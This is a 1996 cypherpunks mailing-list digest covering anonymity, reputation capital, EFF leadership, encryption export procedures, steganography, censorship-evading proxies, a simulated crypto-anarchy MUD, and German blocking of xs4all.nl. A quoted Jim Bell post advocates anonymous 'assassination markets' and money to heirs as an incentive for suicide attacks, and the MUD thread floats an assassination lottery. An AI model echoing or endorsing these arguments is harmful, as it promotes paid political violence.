violence is initiated, where opinion is more important than fact, but IMO: Randy Weaver was not initiating violence. David Keresh was not initiating violence. Pot growers and smokers are not initiating violence. But Mr. Bell, if he follows through on his scheme, *will* be initiating violence. His scheme, while it can sound tempting (especially every April 15th!) has no guarantee that it will _only_ be used against the Lon Horiuchis of our government, in fact, it may be said it is not guaranteed to not be used against Mr. Bell himself, as many have joked. There are two roads to take in life, convincing and coercing others. I think that the former is still possible, Mr. Bell and many others disagree. I worry that abuse of the very young and weak (for now) anonymity system for the purpose of initiating, rather than exposing, violence will lead to more government violence than we already have. Perhaps I am wrong and there is no hope; but if so, that means another revolution. Revolutions are very romantic sounding, to those who have not been in a war. I urge everyone to read "Emancipating Slaves, Enslaving Free Men" by Jeffrey Rogers Hummel for a look at what our last revolution got us (hint: it was *not* less government). I believe the book is available from Laissez Faire books. It is quite good, and refreshingly truthful when compared to the gobbledygook that most history teachers try to force down students' throats. From jya at pipeline.com Fri Sep 6 04:23:20 1996 From: jya at pipeline.com (John Young) Date: Fri, 6 Sep 1996 19:23:20 +0800 Subject: Metcalf and Other Net.Fogies Message-ID: <199609052028.UAA12733@pipe2.t1.usa.pipeline.com> On Sep 05, 1996 10:27:34, 'tcmay at got.net (Timothy C. May)' wrote: Tim's right on the "old fogies." Providing you make the cut off at about 50-55. After that you get retro-infantiles like me (at 61) who have fallen head over heels for the Internet, and are absolutely fed up with being "mature-and-responsible" -- that truly sucks, sucks, sucks. Elsewhere in my field (architecture) I get accused by 40-55 year-olds of trying to brainwash the under-30s. You bet I am, to warn them off the "mature" assholes who think their warped experience is the best teacher, when in fact all it teaches is how to be bent out of shape, and how to project and promote that distortion as the definition of reality. That crippling narrow vision passes at about 50-55 when you realize that you don't know shit, never did and never will. Every fails, in the end, well before The End. So what. Laugh, don't go hurt somebody. Yep, self-deception is the certain sign of maturity, get used to it, it's as unavoidable as the wars mature folks, fearing mortality, wage to kill the helplessness in themselves. Still, I admire the ingenuity of under-30s and over 55s who can trick the middling-matures into serving us, keeping us clothed and sheltered -- and entertained at their pompous fatuities. Don't trust anyone between 30 and 55, especially those nuts with a Solution for The Problem They've Dreamed Up. From declan at eff.org Fri Sep 6 04:23:21 1996 From: declan at eff.org (Declan McCullagh) Date: Fri, 6 Sep 1996 19:23:21 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: Message-ID: Looks like a more extensive translation now is available at: http://www.anwalt.de/ictf/p960901e.htm Tho it's still not complete. The criminal law links are only available in German, for instance. -Declan On Thu, 5 Sep 1996, Stephan Schmidt wrote: > On Thu, 5 Sep 1996, Declan McCullagh wrote: > > > > > You're not talking about http://www.anwalt.de/ictf/p960901e.htm, are you? > > > > I'm talking about this link (you mentioned earlier). > > > Maybe I can translate it (or I can summarize it). > (tomorrow :) > > -stephan > > // declan at eff.org // I do not represent the EFF // declan at well.com // From mark at unicorn.com Fri Sep 6 04:23:59 1996 From: mark at unicorn.com (Rev. Mark Grant) Date: Fri, 6 Sep 1996 19:23:59 +0800 Subject: MUD anyone? In-Reply-To: <9608271647.AA22569@divcom.umop-ap.com> Message-ID: On Tue, 27 Aug 1996, Jon Leonard wrote: > I've been planning to run a MUD like that, at mud.umop-ap.com port 2121. > I just don't have enough coded to be worth announcing yet. Cool. What's it running under? I was planning to base it around the latest version of the Nightmare library for MudOS, which I just downloaded. If I can get a copy somehow I could start hacking on it. > Pseudonyms > Anonymous digital cash (issued by any pseudonym, not just "banks") > Public and private keys > Secret sharing > Anonymous broadcast & message pools > Anonymous markets All sounds like good stuff to me... DC Nets as well, of course. I guess we should also simulate the Net somehow, with Web servers, email, etc. Though the Nightmare library apparently lets you create Mud objects which can access the Web so perhaps we can use the real one somehow (with the obvious security implications). What else? Protection Agencies Escrow Agencies Private Law Courts (probably controlled by players rather than the computer) Reputation Agencies > What am I missing? Should there be direct support for Jim Bell's > assasination markets? It'd provide a means of demonstrating its > ineffectiveness as a means of social control. I think it should be incorporated, but I think that people can set them up easily themselves. Perhaps we should have an NPC-run 'Assasins Inc' which would run the lottery, and then players could do the actual 'wet work'. But yes, I'd really like to see how this would work in the game. As I said I'm thinking of this more as a semi-scientific experiment than a pure game. We have some idea of how this stuff should work in theory, but little of how it works in practice. I do think though that we'd have to enforce some kind of rule against 'disposable characters', otherwise people could simply create a new character every time they were killed trying to assasinate someone. There would need to be some disadvantage to just going in guns-blazing and being killed ten times in a row. > I think that for purposes of simulation, it's reasonable to model > cryptographic primitives in a "Trust the server" mode, because you > need to trust the MUD server anyway (unlike a government), and it > puts a much lower load on the CPU. Yep, I agree. I would like to include the real protocols but it's going to be far too slow. So we could create, say, remailer objects, anonymous digital cash objects, etc. As long as they have the same properties in 'SimAnarchy' as they would in real life then the actual behind the scene mechanics don't matter. We could, perhaps, allow characters to break protocols if they could accumulate enough processing power. I don't know how low a level we'd want to go to. I think that having an explicit group of remailers (and 'IP rerouters') would be a good idea as it would allow people to try to crack messages and perform traffic analysis. Some remailers could be run by NPCs (some of whom would be trustworthy and some wouldn't), others by the players themselves (with or without logging enabled). I'd like to also include some way by which players could write 'software' even if they weren't able to create new objects for the game. So they could perhaps write front-ends for remailers and give them away or sell them to other players. > There's also the question of log policy. Having run a MUD for a few > years, I want to keep logs for bug detection. A declared policy that > they aren't released for n years would work though. Opinions, anyone? Part of me thinks that we should explicitly state that anything may be logged and used in sociological research. Perhaps we could create some kind of secure protocol to allow users to connect without revealing their real identities, so that it wouldn't matter if they were logged? Anyone want to set up a mailing list for this discussion? Mark |-----------------------------------------------------------------------| |Reverend Mark Grant M.A., U.L.C. EMAIL: mark at unicorn.com | |WWW: http://www.c2.org/~mark MAILBOT: bot at unicorn.com | |Approximate Current Location: Auckland, New Zealand | |-----------------------------------------------------------------------| From omega at bigeasy.com Fri Sep 6 04:25:15 1996 From: omega at bigeasy.com (Omegaman) Date: Fri, 6 Sep 1996 19:25:15 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609051928.OAA19142@bigeasy.com> > If anyone objects the officals responsible make a wide gesture and say "We > didn't take away your phones, CRIMINALS took away your phones." Indeed. It appears the Unabomber has taken away the privelege of dropping stamped mail weighing over 16ozs into street-side mailboxes. One is now instructed to take these packages to a post-office mail clerk for mailing. (Of course it's unclear just what would be done if a package weighing over that magical 16ozs was left in a mailbox) > The real question is this, what are you going to do to anihilate anonymous > communication, because if you think its harmful that's what you have to > do. > What strikes me as odd is that the arguments against anonymous communication are nearly identical to those against strong crypto. ie. the same four horsemen flare up in these discussions. Yet we have parties who are ostensibly pro-crypto but anti-anonymity. To put it in a nutshell, in a free society I can have a private conversation, but I must essentially announce that I am having one and who I am having that conversation with? Do you believe the benefits of privacy outweigh the costs? Do you feel the same about cryptography and believe it to be an essential tool to advance the privacy of individuals? Then you _must_ be an advocate of anonymity and anonymous communications. Privacy as a right and a reality does not exist without the capability for anonymity. me -------------------------------------------------------------- Omegaman PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63 Send a message with the text "get key" in the "Subject:" field to get a copy of my public key. -------------------------------------------------------------- From 72124.3234 at compuserve.com Fri Sep 6 04:29:26 1996 From: 72124.3234 at compuserve.com (Kent Briggs) Date: Fri, 6 Sep 1996 19:29:26 +0800 Subject: rc2 export limits.. Message-ID: <199609051720.NAA24787@spirit.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Bill Stewart wrote: > > I'm afraid my source is "Read it on the net and was surprised to hear it". > My assumption is that the limit is for software that implements > both signature and verification, since ITAR doesn't ban export of > pure-authentication software. > > Is the State Dept doc on the net? It would be nice to have something > saying there are well-defined rules that they agree to follow, > unreasonable and unconstitutional though they may be. > I'm still skeptical that such a restriction (1024-bit signatures) exists. If I recall, I originally found the State Dept. doc on the EFF site under a heading of CJ Export kit or something similar. I don't know if it is still there but it was out of date anyway as the contact in it had retired. You can probably contact the DoS and have them mail you one (as I did): Attn: Sam Capino U.S. Department of State Office of Defense Trade Controls PM/DTC Room 200 1700 N. Lynn Street Arlington, VA 22209-3113 Voice: 703-875-7396 Fax: 703-875-6647 The procedure is 5 pages and titled "Procedure for Submitting a Commodity Jurisdiction Request for a Mass Market Software Product that contains Encryption" When using RC2 and/or RC4, you have to request a separate test vector sheet titled "Supplemental Form for Mass Market Software Expedited Review" for each CJ request. Kent P.S. Does anyone know how to turn off this Gratis auto-signing service? I keep getting double posts when replying directly to the list via Netscape to hks.lists.cypherpunks. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMi8L4SoZzwIn1bdtAQF8PQGAl4952bwt/PJofD21qR+sAF0jStgUs76I NY9sfnXFcNHrFdgs6eEXHZ/lv3cstnnt =W0Ug -----END PGP SIGNATURE----- From gregburk at netcom.com Fri Sep 6 04:31:51 1996 From: gregburk at netcom.com (Greg Burk) Date: Fri, 6 Sep 1996 19:31:51 +0800 Subject: Reputations Message-ID: -----BEGIN PGP SIGNED MESSAGE----- mccoy at communities.com (Jim McCoy) writes: > Greg Burk writes: > > Too little incentive to shoot for the heights: > > > > Suppose you judge that you've accumulated twice as much "reputation > > capital" as Joe. How do you get twice as much payoff? It seems to me > > that above the threshhold of credibility, minor side issues make more > > difference than your two-fold "reputation capital" differential. > > Go read Ender's Game by Orson Scott Card (a good book to read anyway :) > and examine the nature of the computer network "discussion groups" he talks > about: a classic example of reputation markets in many-to-many discussions. > With the proper tools someone with twice the reputation capital in a > particular category as another will have a greater chance of what they say > not being filtered out as noise. I have read it, a long time ago. Frankly, it's a spectacularly bad example. He writes of the two child-protagonists gaining reputations as great philosophers on a sort of Usenet. (At the time I believe OSC was a member of Delphi, UNCLEORSON) Look around on the real Usenet. OSC could not have been more wrong. > > As an "asset", it is extremely non-liquid: > > > > How exactly would you "convert" your reputation into other capital? > > Would you accept bribes and tell lies? Seems to me you would only get a > > one-shot "conversion" and it couldn't possibly hope to equal your > > investment. > > Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have > converted reputation capital into large piles of money. Time is an asset > that has a monetary value to most people, and they are willing to spend money You don't seem to realize you are actually including at least one major example of a counterfeit reputation here. I speak of Siskel & Ebert, whom I have caught at least once giving a strikingly dishonest review. I had seen the movie (See You In The Morning) on opening day, before they reviewed it. It stunk. After the credits rolled, the audience walked out in sullen silence, unable to believe they had spent money to see it. Nobody in the entire audience gave any sign of liking any part of the thing even a little bit. Whereas they had been talkative and somewhat excited before it started. A few days later, I saw S&E's review. One of them (Siskel, I think) raved and raved about it. Perhaps he was the only person in the country who liked it, but I don't believe that. He gave it a lengthy, raving thumbs-up. Then the other (Ebert, I think) said "Well, I didn't like it as much as you did", thumbs down, and *stopped*. Conclusion: They knew it stunk, but for some reason I won't speculate on they wanted to say they liked it so they misreported it, and covered their butts with a review that would look mixed later but sound like a rave now. I see a counterfeit reputation. > No, I think that you just don't understand the mechanics of reputations and > how they interact with the most important resource in most people's lives: > time. I'm tempted to tit-for-tat, but I will not refute your points by telling you you just don't understand. > time. Instead of thinking of "reputation" look at it from the other end and > consider the "attention marketplace." Fine, but resolving good vs counterfeit reputations takes time too. > Right now reputation markets have a > limited presence on the internet (mostly through killfiles) because the tools > required are not integreated into the tools used to browse the information. > In time this will change. How? I ask for something more specific than In The Future Everything Will Be Done Right. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMi9qsbMyVAabpHidAQFhmwH9HjxB1rgc1DgIZ0eJzidY4CSr7D7s2gCc qRq+v2APKgIDqjOTt04u+sDgKxeJFb0POBajeV0ARSA61mr3B7mQDA== =DppT -----END PGP SIGNATURE----- From qut at netcom.com Fri Sep 6 04:32:39 1996 From: qut at netcom.com (Dave Harman OBC) Date: Fri, 6 Sep 1996 19:32:39 +0800 Subject: Declaring The Ultimatum To Fascist Germany In-Reply-To: Message-ID: <199609052104.OAA00829@netcom.netcom.com> ! (I also don't dislike Germans in general. I studied some German in high ! school--don't ask me to use it, though!--and have visited Germany. They ! just have a certain well-known tendency to take the authoritarian path at ! times.) Yes. How to get an anonymous Unix shell account in Germany, Singapore and the UK? Easy here, but is some *law* or custom in Germany to force ISP customers to show to demand passports or Germany's national ID card the citizens are forced to carry at all times under penalty of jail for the failure to do so? There's obvious reasons why I and Declan would like to get accounts anonymously. But I'd do it with my passport name if I am able to do so. Distributing censored information carries more of a political statement if conducted by those with accounts that are located in the unfree country itself. If something like Gerhard Lauck is practical proof, only those who intend to actually ever go to Europe or Asia in the status quo need worry about actually getting incarcerated for situationist anti-censorship activities. Who cares, I don't, personally. From markm at voicenet.com Fri Sep 6 04:37:09 1996 From: markm at voicenet.com (Mark M.) Date: Fri, 6 Sep 1996 19:37:09 +0800 Subject: Steganography -- Tell Tale Signs? In-Reply-To: <199609050421.VAA21428@sirius.infonex.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 4 Sep 1996, makofi wrote: > 1) If I hide some PGP encrypted data in a > gif, jpg or wav file will there be any tell tale > signs to the naked eye of an expert? If yes, > what are they? I don't think so. Especially for jpg which uses a lossy compression scheme. Any random noise could be attributed to the compression. There is already enough noise in wav files that inverting one bit won't make much of a difference. > 3) Are there any tools at the moment > to expose (not crack) the hidden encrypted > data? If none. are there tools in development? The whole point of steganography is plausible denial. The data that someone could de-stego from a file should just be random garbage, in which case there would be no way of telling whether there was an encrypted file stegoed in the data file. If PGP files are used, a utility like Stealth is a must. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMi9aFCzIPc7jvyFpAQFyUggAkBekMcImimtOOtXMavb+YFj6uNLnlgKu leuX37PwQn9ROHjYBiZvhLpTWo8vn5cATI6apN0HUHW81Iy9bss67KkWY/x1tb34 qqR1KMYpEF8MexyiqKxFkOC9Zy/OcufPFIauV2TVlxPXY9m6whH8LPLV81EMYB0M kAYLGfbDkgQFEgP8prm7AAqArSL7jt80t6OQWOVJU4CebBK5P0onR+9tujhyxrdX N/GjpeW4cIdn+C3pW6bdxlwgRne9b9dAPcbEeLCOhFwnhBtO1tvg+OyKzPrmVuEh OaKBwfwSRiGbBCaGv9EXmTIxEGqFfFGioEhRwwCvKsL9JW3NZevSKg== =CuOh -----END PGP SIGNATURE----- From azur at netcom.com Fri Sep 6 04:37:40 1996 From: azur at netcom.com (Steve Schear) Date: Fri, 6 Sep 1996 19:37:40 +0800 Subject: Tack of Internet censorship Message-ID: >nobody at replay.com wrote: >Six months ago, the Internet censors and Exon wannabees took the >tack of "the Internet is too hard to censor". > >Now, their motto is "There will be some who get around our >censorship, but we will try anyway." > >Unfortunately, I believe these censorship strikes will >keep happening unless we find a way to stalemate them. > >What I am proposing is that Apache or other WWW servers >have a way to allow access to site B's URL at site A, >similar to the old trick of finger user at sitea.com@siteb.com. > >Implementation should be simple. However, I wonder what >is a good standard way to specify this in the URL or >a site. Whatever happened to Ray Cromwell's Decense project ? Decense, "a cgi script designed to provide a double-blind pseudonym scheme which allows a site to hide behind a chain of http servers which 'proxy' for it. Neither the user [ID] requesting the document, nor the ultimate address of the destination web site is immediately available to prying government eyes. -- Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear, N7ZEZ | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From jonl at well.com Fri Sep 6 04:37:49 1996 From: jonl at well.com (Jon Lebkowsky) Date: Fri, 6 Sep 1996 19:37:49 +0800 Subject: Metcalf and Other Net.Fogies Message-ID: <2.2.16.19960905154111.2b6f55fa@mail.well.com> At 10:27 AM 9/5/96 -0700, Timothy C. May wrote: >I'm evolving a hunch that the problems we're seeing with "old fogies" >denouncing the Net, and anonymity, and "smut on the Net," are part of a >larger cultural issue. Namely, the familiar case of an older generation >complaining about the sloth and sin of the younger generations. Hey, I'm 47, and I haven't given up on sloth and sin yet. 8-) Seriously, the problem here is that you don't want to set up the stereotype you allude to further down ('don't trust anyone over 30'). Stereotypic thinking, ya know? Besides which, I've run into some real dorks who were UNDER 30... >(Caveat: I'm 44, so I'm certainly a generation older than many of you, and >am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor, >Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was >in college, I recall of course similar predictions of disaster. (And as it >turned out, the predictions that promiscuity would lead to a disaster >turned out to be partly correct, viz. AIDS.)) Hmmmmm...are Dyson and Kapor really net.doomsayers? I really haven't heard any kinda doom and gloom from those two... >Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how >publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a >few minutes ago. He repeated his prediction of an "Internet collapse" in >1996, based on overuse, on bad pricing models, on lack of controls, and on >other concerns. ... and I've tended to think Metcalfe was just sending an 'ad absurdum' flare when he predicted the death of the Internet, not so much predicting as taking an impact analysis to the extreme. >It could be that the Dennings, Dysons, Kapors, etc. of the world are simply >growing jaded with the Net and are projecting their own ennui in their >comments that the Net may need to be controlled. This may come with age, as >I'm sure the Kapor of 25 years ago would not have wanted President Nixon >and Attorney-General Mitchell telling him what he could read and write. I'm not sure which comments you're referring to, but I've come to understand that the generation-gap thing has no pat answer. Dave Farber is younger than Bruce Taylor, if ya know what I mean...and there are plenty of old pharts who are active in the various movements and groups opposing any restriction of the Internet. >(In fairness, none of these folks listed have called for censorship. But >all have expressed "concerns" of one sort or another. Not that discussing >concerns is inappropriate--after all, we do it all the time. But I sense in >many of their phrasings of concerns a stereotypical "old fogeyness" >emerging.) I dunno. Consider this: almost 30 years ago a bunch of us were more or less active in left wing politics that had some of the same aims I see expressed on this list and elsewhere, and we made mistakes. I don't know that I learned from my mistakes the way you're sposed to, but some folks learned, and are trying not to fuck up again. On the other hand, some folks really are just stodgy, but I bet they were stodgy kids, too. >Just a thought. Maybe the solution to the EFF problem is to "not trust >anyone over 30." Heh, right. Feet tall. -- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com From jf_avon at citenet.net Fri Sep 6 04:37:54 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 6 Sep 1996 19:37:54 +0800 Subject: Race Bit: C Message-ID: <9609051658.AA20681@cti02.citenet.net> On 5 Sep 96 at 0:30, Anonymous, a man with a double standard wrote: > For them, I would go to jail; for you, I would even cooperate with > the BATF (which should be defunded 100%, IMO). Why would you go to jail? Who made jails and who would use violence to bring you in? jfa From gregburk at netcom.com Fri Sep 6 04:38:59 1996 From: gregburk at netcom.com (Greg Burk) Date: Fri, 6 Sep 1996 19:38:59 +0800 Subject: Reputations Message-ID: <543fs4fz39@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- tcmay at got.net (Timothy C. May) writes: > To stick with my restaurant example, consider _advertising_. MacDonald's > and Burger King spend hundreds of millions of dollars every year claiming > their "restaurants" are great. Many millions of people obviously are > swayed. So? > > Others choose not to trust the advice of the MacDonald's hucksters. Maybe > only a tiny fraction choose Chez Panisse over MacDonald's. This is the way > of the world. > > It's still the give and take of reputations. It ain't perfect (in that it > doesn't produce results I believe are empirically valid and optimum :-}). > But it's all we have. It's the market. The agora. I'm reading "It's shaky. Accept that." Fine, consider it accepted. I don't think it is comparable to the market, simply because even the more nebulous market exchanges (say, consultant-on-call) are much more clearly defined. > >"Reputation capital" is hard to spend down to absolute 0 because it is > >significant work to distinguish valid "reputation capital" from > >worthless counterfeit, and it is easy to counterfeit... just talk. > > I strongly disagree. It's quite possible for Person A to quickly convert > his reputation to Person B to a _negative_ value. Real quick, in fact. I don't see how there can be such a thing as negative reputation capital. Wouldn't that mean B believes the opposite of what A says? If you anti-believed someone in a consistent manner, couldn't they exploit that? Also, you are speaking only of 1-to-1 reputation-relationships. But that is inefficient. The mere fact of having to evaluate each person's reputation yourself is significant work. On the other hand, you could talk about the transmission of reputations. This seems more in line with what I understood "reputation" to mean, to include some element of indirect knowledge. But that's mighty easy to abuse and therefore mighty hard to trust. For instance, when a certain infamously-low-reputation (deservedly so) individual recently joined the cypherpunk lists, others who had endured him in the past tried to relay their impressions of him. It proved very difficult to convey, and they were somewhat attacked for their efforts and not entirely believed. In other words, he *could not* spend down to 0, despite years of unflagging effort. > Perhaps my short article did not fully explain a few things. Reputations > are a _tensor_ or _matrix_ quantity. Person A has a reputation R(A,B) to > Person B, a reputation R(A,C) to Person C, and so on. (And the matrix may > be further broken down into reputations for advice on various subjects, in > various fields, etc.) I can't dispute or agree with your mathematical model until we can agree on more basic issues. > We may lump a lot of folks together and say, for example, that MacDonald's > has a reputation of R (MacDonald's, lots of people) = 0.7531. And perhaps R > (Chez Panisse, lots of people) = 0.0013 (i.e., they don't know what it is, > and so value the rep of Chez Panisse at near zero). > > And so on. Lots of examples could be given. I'll accept your example, but I don't see how the numbers are meaningful. > Now suppose that J. Anonymous Gourmand announces that MacDonald's is shit. > How much will anonymous claim hurt MacDonald's? Obviously, not much. Well, how many people did J. Anonymous Gourmand reach, anyways? Now, suppose J. Anonymous Gourmand spams all of Usenet, and millions of people who have never heard of J. Anonymous Gourmand before read a plausible but false account of the disgustingness of McDonald's food. Perhaps the same detailed study, just fake. (Not to intertangle this with other issues, let's further suppose that Ms. Gourmand sneaks in underneath spam-watcher's radar, and cleverly appears to be on topic in every group.) Nothing about her reputation has changed, but surely when her claim is read by millions it will hurt McDonalds a non-trivial amount. Again, that doesn't mean the reputation was not a factor. > But > what if the American Heart Association publishes a detailed study on the > fat levels of MacDonald's products and declares it to "Dangerous." The > effect will probably be greater, as R (AHA, many people) = high, and by the > kind of Dempster-Shafer belief calculus I discussed a few months ago, the > rep of the AHA propagates semi-transitively to the rep of MacDonald's. > > (This all happened recently, with the famous studies of fat levels of movie > theater food...sales dropped almost overnight, and now the fat levels of > popcorn, etc., have been changed for the better.) I don't think you are illustrating what you think you are. Consider the American Sociological Association. Wouldn't you say its reputation is equivalent to the American Heart Association's? Most people would, I think. And various claims by ASA members have certainly gotten as much press as anything the AHA has got. But the ASA winks at severe violations of its Code Of Ethics and lets its members pursue their Politically Correct agendas at the expense of science. They have effectively counterfeited a reputation. I've already made the points I wanted to make, so I may not have further comments. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMi9qpbMyVAabpHidAQFRnwH8CyCjOnz071ZMWXNNURR/NMSMw9y9bs+n dutQOqLSNqeJhsYwNZJP2Z1o+JdhWZ7sQ/xnhdWbdupYsoRhcpacpA== =zcJQ -----END PGP SIGNATURE----- From mech at eff.org Fri Sep 6 04:39:30 1996 From: mech at eff.org (Stanton McCandlish) Date: Fri, 6 Sep 1996 19:39:30 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609050409.XAA28542@mailhub.amaranth.com> Message-ID: <199609052242.PAA24752@eff.org> > >If this is the case she needs to be _much_ more careful about what she > >says in `personal' interviews. > > > > There seems to be a point being missed in this thread. :( > > This was not a 'personal' interview. The paper was not interested in > Ms. Dyson's views on anonymity on the internet because she seemed like a > nice person. The only reason she was interviewed is because of her > position with the EFF as chairwoman. Rather unlikely, actually. Dyson is far better known, everywhere but the Internet early-adopter crowd, as publisher of Release 1.0 and an industry analyst. Same goes for a lot of our other boardmembers. Who many people outside of the civ-lib crowd know Jane Metcalfe from EFF, vs. from Wired? Even Mitch Kapor is better know as founder of Lotus than of EFF. A lot of press coverage she gets never even mentions EFF at all! Barlow's probalby the only exception - retired ranchers and songwriters who aren't also singers generally don't attract many reporters. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From pjb at ny.ubs.com Fri Sep 6 04:42:40 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Fri, 6 Sep 1996 19:42:40 +0800 Subject: Browne and foreign tyrants Message-ID: <199609051640.MAA00475@sherry.ny.ubs.com> i also have never heard of an attempt on Hitler's life by anyone other that the germans. the us did, however, assassinate Yamamoto Isoroku, and did a very neat job of it at that. i once read a sci-fi story about time travelers going back to kill Hitler, and the disaster that occured when someone succeeded and Hitler's place was taken by someone even more onerous. in the story there was a group of people whose job it was to prevent this assassination, since so many people in the future had that idea that doing away with Hitler was a good thing to do there was practically a queue of would-be assassins. -paul > From cypherpunks-errors at toad.com Thu Sep 5 03:07:59 1996 > X-Sender: jimbell at mail.pacifier.com > X-Mailer: Windows Eudora Light Version 1.5.2 > Mime-Version: 1.0 > Content-Type> : > text/plain> ; > charset="us-ascii"> > Date: Wed, 04 Sep 1996 16:43:23 -0800 > To: libernet-d at listserv.rmii.com, nwlibertarians at teleport.com, > dnowch2 at teleport.com > From: jim bell > Subject: Browne and foreign tyrants > Sender: owner-cypherpunks at toad.com > Content-Length: 2362 > > >From: "George D. Phillies" > >Subject: Re: Browne & foreign tyrants > >There is a section of the Geneva Protocols forbidding actions in occupied > >territories directed against officers of political parties. Under that > >section, the actions in Somalia against, e.g., the treasurer of General > >Aidid's political party, were war crimes. No one seems to get very upset. > > > >> If there is such a treaty, the US has a long history of ignoring it. > >> > >> 0) Attempts to kill Hitler. > >I don't think we ever tried this. > > And this was a real shame. Over 30 million people died in WWII, directly or > indirectly. We knew that Hitler was going to be a problem well before 1936. > Think how many could have been saved... > > If anything, WWII is excellent proof that AP is a good idea. Stauffenberg > was the German who bombed Hitler's meeting in 1944 but failed to kill him. > Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a > recent "60 Minutes" episode related how hundreds of people knew about this > plot. > > The reason he failed was that while he was preparing the two bombs in a > bathroom, he was interrupted. (The bomb's delay mechamism was acid > dissolving a metal.) Rather than being caught, he left one of the > briefcases in the bathroom and went to the meeting with only one bomb. > Furthermore, he left the bomb at the meeting, but it was pushed behind the > heavy table after he left, which shielded Hitler from much of the force of > the explosion. > > If AP (or at least, some anonymous reward mechanism for Stauffenberg's > family) had been available, he would have done "the honorable thing," and > walked up to Hitler with the bomb and instantly detonated it right there, > resulting in both Hitler's and Stauffenberg's certain death. At least > hundreds of thousands or perhaps over a million people would have SURVIVED. > As it happened, Stauffenberg's reticence caused not only his death after > torture, but also the deaths of well over a hundred coup-plotters, but also > the thousands that were yet to die in the last 6+ months of WWII. > > Question: Would you kill yourself to save a million lives? Even if you > wouldn't, would you change your mind if your heirs would be anonymously paid > an extra $10 million dollars or so? I'd say that's a pretty substantial > motivation, wouldn't you? > > > > Jim Bell > jimbell at pacifier.com > From bdavis at thepoint.net Fri Sep 6 04:47:02 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 6 Sep 1996 19:47:02 +0800 Subject: Voluntary Disclosure of True Names In-Reply-To: Message-ID: > > > >the above is almost exactly what Dyson was saying, and I have been > > No, Dyson said "Therefore I would favor allowing anonymity -- with some > form of traceability only under terms considerably stronger than what are > generally required for a wiretap." ^^^^^^^^^^^^^^^^^^^^^ > I wonder what Dyson would consider acceptable? Regardless, she is not going to get it. EBD > This implies a role for government, and concomitant restrictions on related > anonymity technologies, to provide traceability. So much for mutual > agreement between sender and recipient. > > (I have nothing against senders and recipients agreeing to use the services > of some third party in providing ultimate traceability. I'm not wild about > the U.S. Government being this third party, paid for by tax money, but so > long as it is not required, it's a minor concern to me. I surmise, though, > that use of the U.S. Government as a third party would not be optional, in > the schemes of Dyson, Denning, and others of that ilk.) > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From tank at xs4all.nl Fri Sep 6 04:51:45 1996 From: tank at xs4all.nl (tank) Date: Fri, 6 Sep 1996 19:51:45 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: <199609060818.KAA00428@xs2.xs4all.nl> Please forward: Contact: XS4ALL Internet BV (http://www.xs4all.nl) Postbus 1848 1000BV Amsterdam Fax: +31-20-6274498 Email: felipe at xs4all.nl * * * P R E S S R E L E A S E * * * GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES German internetproviders, joined in the Internet Content Taskforce (ICTF), started censoring the Dutch website www.xs4all.nl, containing 3100 personal and commercial homepages. This act of censorship is caused by the webpage of a magazine that is banned in Germany, Radikal (http://www.xs4all.nl/ ~tank/radikal/). A German prosecutor sent the following message to the ICTF (http://www.anwalt.de/ictf/p960901e.htm): "Under the following addresses in Internet: http://www.serve.com/spg/154/ http://www.xs4all.nl/~tank/radikal//154/ and using the link on page http://ourworld.compuserve.com/homepages/angela1/radilink.htm one can call up the entire edition of the pamphlet entitled radikal Nr. 154". Parts of this pamphlet justify preliminary suspicion of promoting a terrorist organization under ' 129a, Par.3 of the German Criminal Code, public condoning of criminal activities penalizable under ' 140 no.2 of the German Criminal Code and preliminary suspicion of inciting to criminal activity under ' 130a Par.1 of the German Criminal Code. The Public Prosecutor General at the Federal Court of Justice has therefore initiated a criminal investigatory procedure against the parties disseminating this pamphlet. You are herewith informed that you may possibly make yourself subject to criminal prosecution for aiding and abetting criminal activities if you continue to allow these pages to be called up via your access points and network crosspoints" Providers in Germany are already blocking packets to and from the host www.xs4all.nl. The 3100 websites on this server include the Kurdistan Information Network (http://www.xs4all.nl/~tank/kurdish/htdocs/), the very popular Internet Charts (http://www.xs4all.nl/~jojo/) and the world famous 